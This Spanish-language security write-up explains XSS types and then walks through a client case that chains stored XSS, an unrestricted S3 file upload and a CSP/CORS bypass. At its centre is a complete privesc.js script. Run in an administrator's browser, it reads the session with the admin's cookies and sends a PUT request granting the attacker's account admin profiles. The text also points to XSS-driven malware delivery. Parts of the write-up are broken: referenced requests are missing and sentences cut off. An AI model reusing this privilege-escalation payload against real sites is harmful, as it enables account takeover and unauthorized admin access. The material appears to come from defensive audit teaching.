XSS (Cross-Site Scripting) es una vulnerabilidad de seguridad que permite a un atacante inyectar scripts maliciosos (generalmente en JavaScript) en una página web. Estos scripts se ejecutan en el navegador de otros usuarios, lo que puede permitir el robo de información sensible, como cookies o credenciales, o realizar acciones no autorizadas en nombre de la víctima.
Clasificación
XSS Reflejado:
El código malicioso se envía como parte de la URL o un formulario y se refleja inmediatamente en la respuesta del servidor. El script solo se ejecuta cuando el usuario hace clic en un enlace malicioso.
XSS Almacenado:
El código malicioso se guarda en el servidor, como en un comentario o publicación. Luego, cada vez que alguien ve esa página, el script malicioso se ejecuta en su navegador.
XSS Basado en el DOM:
En un DOM-based XSS, el ataque ocurre dentro del navegador, manipulando el contenido dinámico que ves en la página. Aquí no hay una respuesta directa del servidor. El script malicioso se ejecuta porque el navegador toma los datos que ingresa el usuario y los inserta en la página sin verificar si son seguros. Esto puede ocurrir a través de sumideros, que son lugares en la página donde esos datos se insertan (como un campo de texto o una etiqueta de título).
Estos ejemplos son ideales cuando tenemos subida de archivos a buckets S3 por ejemplo, donde si subimos un SVG que haga una redirección podemos demostrar un poco más de impacto en un XSS.
XSS + Unrestircted File Upload + Bypass CSP y CORS
En el siguiente ejemplo tenemos un caso real donde un cliente era vulnerable a XSS a través de un campo descripción, supongamos que era para guardar un curso, bueno, en la descripción del curso era vulnerable a XSS.
privesc.js:
(async function () {
console.log("[*] Verificando cuenta...");
// Variables de configuración
const initSessionUrl = "https://vulnerablesite.com/web/init-session";
const elevatePrivilegesUrl = "https://vulnerablesite.com/user/data";
const targetEmail = "razor@hackermail.com";
const headers = {
"Sec-Ch-Ua-Platform": '"Linux"',
"Accept-Language": "en-US,en;q=0.9",
"Accept": "application/json, text/plain, */*",
"Sec-Ch-Ua": '"Not?A_Brand";v="99", "Chromium";v="130"',
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Sec-Ch-Ua-Mobile": "?0",
"Sec-Fetch-Site": "same-site",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
};
try {
// Paso 1: Verificar cuenta
const sessionResponse = await fetch(initSessionUrl, {
method: "GET",
headers,
credentials: "include", // Enviar cookies con la solicitud
});
if (!sessionResponse.ok) {
console.error("Error al verificar la cuenta:", sessionResponse.status);
return;
}
const sessionData = await sessionResponse.json();
const { correo, roles, permissions } = sessionData.userData;
console.log(`[$] Cuenta de ${correo} obtenida, listando roles:`);
console.log(`[#] Roles de ${correo}:`);
console.log(roles);
console.log(`[#] Permisos de ${correo}:`);
console.log(permissions);
// Paso 2: Elevar privilegios
console.log(`[*] Elevando privilegios al usuario ${targetEmail}...`);
const elevationPayload = JSON.stringify({
userId: 100, // ID del usuario objetivo
perfiles: [1, 2, 3], // Perfiles administrativos
});
const elevationResponse = await fetch(elevatePrivilegesUrl, {
method: "PUT",
headers: {
...headers,
"Content-Type": "application/json;charset=UTF-8",
},
body: elevationPayload,
credentials: "include", // Enviar cookies con la solicitud
});
if (elevationResponse.ok) {
console.log("[$] Permisos administrativos otorgados");
} else {
console.error("Error al intentar elevar privilegios:", elevationResponse.status);
}
} catch (error) {
console.error("Error en el script:", error);
}
})();
Este archivo se subió a un bucket S3 aprovechando la vulnerabilidad Unrestricted File Upload.
Una vez que se subió el archivo javascript el cual iba a otorgar permisos administrativos a su usuario de pruebas se procedió a enviar la siguiente request:
En la solicitud previa lo único que cambia es que se agrega una imagen que cuando se genera un error porque no se lo encuentra llama al privesc.js del bucket, ejecutándose en el contexto del usuario que esté observando el curso actual. Cuando el administrador vea el curso y se inter
Por detrás la solicitud que viaja es la siguiente:
Como la solicitud la ejecuta un administrador, hace que el usuario atacante en este caso con userId 100 eleve sus privilegios al asignarse los perfiles administrativos 1, 2 y 3.
El archivo JS en el bucket permite que pase desapercibido y al ser de un dominio confiable (vulnerablesite.com) permite la carga del mismo respetando las políticas de CORS y CSP. Es decir,
Condiciones para que este ataque se dé:
Que haya XSS.
Que esté sobre un dominio confiable el bucket. En este caso estaba sobre el dominio vulnerablesite.com pero hay otros casos donde las respuestas
XSS para descargar malware
En este ejemplo vemos un XSS donde previamente se podía subir malware a un Bucket S3 por lo que se concate el XSS con el Unrestricted File Upload:
Hay otros ejemplos donde si no podemos robar una cookie de usuario podemos llevar al usuario víctima a ejecutar acciones sin su consentimiento lo que se conoce como CSRF
BXSS Hunter
Una buena alternativa a buscar XSS es la herramienta BXSS que te entrega diferentes payloads y se si triggerea un XSS te llegará toda la información a la plataforma:
Disclaimer:
Los casos y ejemplos mostrados en esta sección forman parte de auditorías y evaluaciones de seguridad realizadas en el contexto de proyectos profesionales con . No se divulga información sensible, interna o específica de ningún cliente, y se ha tenido especial cuidado en proteger su confidencialidad.
Además, cualquier vulnerabilidad mencionada o ilustrada en estos ejemplos ya ha sido corregida de manera responsable, siguiendo los procesos adecuados de remediación y comunicación con los respectivos equipos.
Este contenido es compartido únicamente con fines educativos y de mejora continua en prácticas de seguridad.
Resulta que para este caso, no había forma de saltar las políticas y , por lo que el hacker decidió crear el siguiente script:
